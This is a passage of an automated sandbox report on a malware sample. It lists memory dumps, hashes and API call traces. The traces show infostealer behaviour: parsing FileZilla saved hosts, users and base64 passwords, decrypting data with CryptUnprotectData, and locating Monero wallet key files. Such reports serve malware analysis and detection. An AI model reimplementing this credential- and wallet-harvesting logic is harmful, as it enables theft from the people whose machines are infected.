                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Mq?$zx+-$.}
                                • API String ID: 0-4024853454
                                • Opcode ID: 4d1f0a96ef4693d4a56799d7517df0a7e11c980a27d3b53de96c3e3205e98322
                                • Instruction ID: e3b567bc59b32b9985078e6b30d3cb12c28238eec8d66f931056b6233b40567c
                                • Opcode Fuzzy Hash: 4d1f0a96ef4693d4a56799d7517df0a7e11c980a27d3b53de96c3e3205e98322
                                • Instruction Fuzzy Hash: B3A207F3A086049FE704BE2DEC8577ABBE5EF94320F1A493DEAC483744E63558158687
                                APIs
                                • CoCreateInstance.COMBASE(00EDE118,00000000,00000001,00EDE108,00000000), ref: 00ED3758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00ED37B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: ee3dbc931606177f290133f550e284453de3f0735e773c3d1d988fc295c370e1
                                • Instruction ID: 3a5a858a3c8598385ae9368f0ee89dead2a36963bef1c2a124236c8cd4695b99
                                • Opcode Fuzzy Hash: ee3dbc931606177f290133f550e284453de3f0735e773c3d1d988fc295c370e1
                                • Instruction Fuzzy Hash: 76410974A00A189FDB24DB58CC84B9BB7B5FB48302F4051D9E608AB2D0D7B16EC6CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EC9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EC9BA3
                                • LocalFree.KERNEL32(?), ref: 00EC9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 473b8a08ad182989497481f07f0683924c9d612bd06e7c0661a0e6ee28685c29
                                • Instruction ID: 339e0c453d368c8636bbe19eef3a5e6092bb80eed05183306e46ec3c73f58b10
                                • Opcode Fuzzy Hash: 473b8a08ad182989497481f07f0683924c9d612bd06e7c0661a0e6ee28685c29
                                • Instruction Fuzzy Hash: 7C11F7B8A00209EFCB05DF94D989EAEB7B5FF88300F1045A8E815A7344D771AE51CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,=$CZc
                                • API String ID: 0-4267854955
                                • Opcode ID: 56e0bf55f7102340bd59da046f7c2f206cc1af8e60442abfc2e73926eb8c4cd7
                                • Instruction ID: 9423ff2d12db0887533e6880ee138a5702bab15705f9fcb485680c52813f5270
                                • Opcode Fuzzy Hash: 56e0bf55f7102340bd59da046f7c2f206cc1af8e60442abfc2e73926eb8c4cd7
                                • Instruction Fuzzy Hash: 96B239F3A0C614AFE3046E2DEC8566AFBE9EF94320F1A453DEAC4C7744E63558018697
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE15B8,00EE0D96), ref: 00ECF71E
                                • StrCmpCA.SHLWAPI(?,00EE15BC), ref: 00ECF76F
                                • StrCmpCA.SHLWAPI(?,00EE15C0), ref: 00ECF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECFAB1
                                • FindClose.KERNEL32(000000FF), ref: 00ECFAC3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 9d6b0516e8152cf1e191ea057d921674d472549c9eb08b710ccf519b93f74b4f
                                • Instruction ID: 0b28c31c141b710e9839ec6755b03d1e2692a4b7f088d1e603470707feb61bfa
                                • Opcode Fuzzy Hash: 9d6b0516e8152cf1e191ea057d921674d472549c9eb08b710ccf519b93f74b4f
                                • Instruction Fuzzy Hash: 3911753580014D9BDB18EB60DC55AED73B8EF10300F5452BBA51A66592EF302B4BD752
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Bn{?
                                • API String ID: 0-683484288
                                • Opcode ID: 74c5f80c6dc29c1f4d9ef5710b49bcf5271de31761435eb0dae13e8369170a65
                                • Instruction ID: 6f0cca3fd40dbff9f6c525d79d8a64b5f4431ddf81f3f6a80dec3a1a7b14f724
                                • Opcode Fuzzy Hash: 74c5f80c6dc29c1f4d9ef5710b49bcf5271de31761435eb0dae13e8369170a65
                                • Instruction Fuzzy Hash: D66128F3E191205BE7146E29DC4576AFADAEBD4320F1B863DDAC893784E9355C0487C2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4074e47ec79813d78b52a1a868e34b04fe6ad73dbcc91530e7a4679db1f75f2e
                                • Instruction ID: 67302b7559dcf3359941d51f59ef177ea275986b28dc1f12c426fb3e8d08faa0
                                • Opcode Fuzzy Hash: 4074e47ec79813d78b52a1a868e34b04fe6ad73dbcc91530e7a4679db1f75f2e
                                • Instruction Fuzzy Hash: 92323AF3A082149FE3046E2DEC8567AFBE9EF94760F1A493DEAC4D3340E93558058697
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b87503b168c8fd93e199e347fa559f9194e5431ce1ddd52a60334a783de15161
                                • Instruction ID: bb2fb372db878d9dfdf67db8d65cf912b99430013bc24612d2053fa5cb719a93
                                • Opcode Fuzzy Hash: b87503b168c8fd93e199e347fa559f9194e5431ce1ddd52a60334a783de15161
                                • Instruction Fuzzy Hash: 4841F2B3B142141FF300A92EDD857B677CADBC4760F1AC53ADA84C7784E9398C0642D1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9217be0083c5822ed045cd1a6b8ea2c4e313c2926c837543a41ada68a9d9cab
                                • Instruction ID: 43fb9dd58a954af2773345109e7f4d5174ce9d16ef45b16b50810132111d4a5d
                                • Opcode Fuzzy Hash: e9217be0083c5822ed045cd1a6b8ea2c4e313c2926c837543a41ada68a9d9cab
                                • Instruction Fuzzy Hash: 525104B3E046109BE3445E29DC8432AFAE5EFD4720F2BC93DDAC857785D6394C458786
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90674befd680ca1b2570b7f027c4df6d0badee27096a3921d918a850ff990f25
                                • Instruction ID: 9c26e244f413dfa2273ee97fc000dd732d4e5b0b6c1b437da6355c25724e18ef
                                • Opcode Fuzzy Hash: 90674befd680ca1b2570b7f027c4df6d0badee27096a3921d918a850ff990f25
                                • Instruction Fuzzy Hash: 6B2105F3E186205BF3446E6CCC49326B6DAEB94310F2B853CDAC8937C4ED39580486DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00EE0DBA,00EE0DB7,00EE0DB6,00EE0DB3), ref: 00ED0362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED0369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00ED0385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00ED03CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED03DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00ED0419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00ED0463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00ED0562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00ED0571
                                • lstrcat.KERNEL32(?,url: ), ref: 00ED0580
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED0593
                                • lstrcat.KERNEL32(?,00EE1678), ref: 00ED05A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED05B5
                                • lstrcat.KERNEL32(?,00EE167C), ref: 00ED05C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00ED05D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED05E6
                                • lstrcat.KERNEL32(?,00EE1688), ref: 00ED05F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00ED0604
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED0617
                                • lstrcat.KERNEL32(?,00EE1698), ref: 00ED0626
